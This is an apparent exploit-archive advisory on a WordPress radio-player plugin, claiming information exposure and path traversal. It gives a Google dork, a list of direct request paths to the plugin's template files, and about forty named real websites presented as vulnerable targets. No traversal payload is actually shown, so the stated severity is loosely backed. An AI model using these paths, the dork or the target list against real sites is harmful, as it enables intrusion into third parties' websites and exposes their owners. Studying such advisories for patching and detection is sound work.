WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x File Information Exposure

########################################################################################

# Exploit Title : WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com
# Software Download Link :
codecanyon.net/item/shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin/20667135
# Software Price : 21$
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : From 3.0 To 4.9.x
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/lbg-audio8-html5-radio_ads/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

########################################################################################

WordPress Plugin - SHOUT - HTML5 Radio Player With Ads - ShoutCast and IceCast Support

########################################################################################

# Impact :
***********

* WordPress lbg-audio8-html5-radio_ads 4.9.x and other versions is prone to an arbitrary file disclosure 

vulnerability because it fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to view local files in the context of the web server process, 

which may aid in launching further attacks. 

* An information exposure is the intentional or unintentional disclosure 

of information to an actor that is not explicitly authorized to have access to that information.

* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* The software uses external input to construct a pathname that is intended to identify a file or 

directory that is located underneath a restricted parent directory, but the software does not 

properly neutralize special elements within the pathname that can cause the pathname 

to resolve to a location that is outside of the restricted directory.

########################################################################################

# Exploit :
*************

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Playlist

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/banners.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/categories.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/help.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Add_New

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Help

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/players.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/playlist.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/preview.html

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/settings_form.php

########################################################################################

Video Tutorials => 
*******************

Installation - youtube.com/watch?v=km5cVH-iH_8
How To Use The Player - youtube.com/watch?v=DVLHNopEpXw
Manage The Banners - youtube.com/watch?v=i4CWseyJmLc

########################################################################################

# Example Vulnerable Sites :
*************************

[+] radioekklesia.com/radio/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] novorio87fm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] skatemetalold.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] j-air.com.au/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] mediality.fr/glitter/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiouppermurray.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] soberforliferadio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiostudion.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiosuper.mobi/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] pamehellas.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] sociedadenewsfm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiopeniel.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] osmiumawards.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiomorabeza.cv/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] wwcufm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiopolis.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiost.com.br/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] patrola021.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] soleilfmbenin.com/sfm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] lawtudent.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] imprensamadureira.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] streaminginternacional.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] bandeando.fm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] mantenanews.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radio-varazdin.hr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] hostpa.com.br/siteum/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiocapital.cat/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] xn--aydnrehberi-1zb.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] gokiebox.pe/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiotown.fi/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] tendenciafm.cl/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radio7.co.tz/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radios.bolivia.bo/backup/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] goldenflash.be/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] nordestefmbrasilia.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] ucradio.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] ellinikos.live/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] princesafm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] djgrga-radio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] nococommunityradio.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] diocesedecaxiasdomaranhao.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] umakiwefm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

########################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

########################################################################################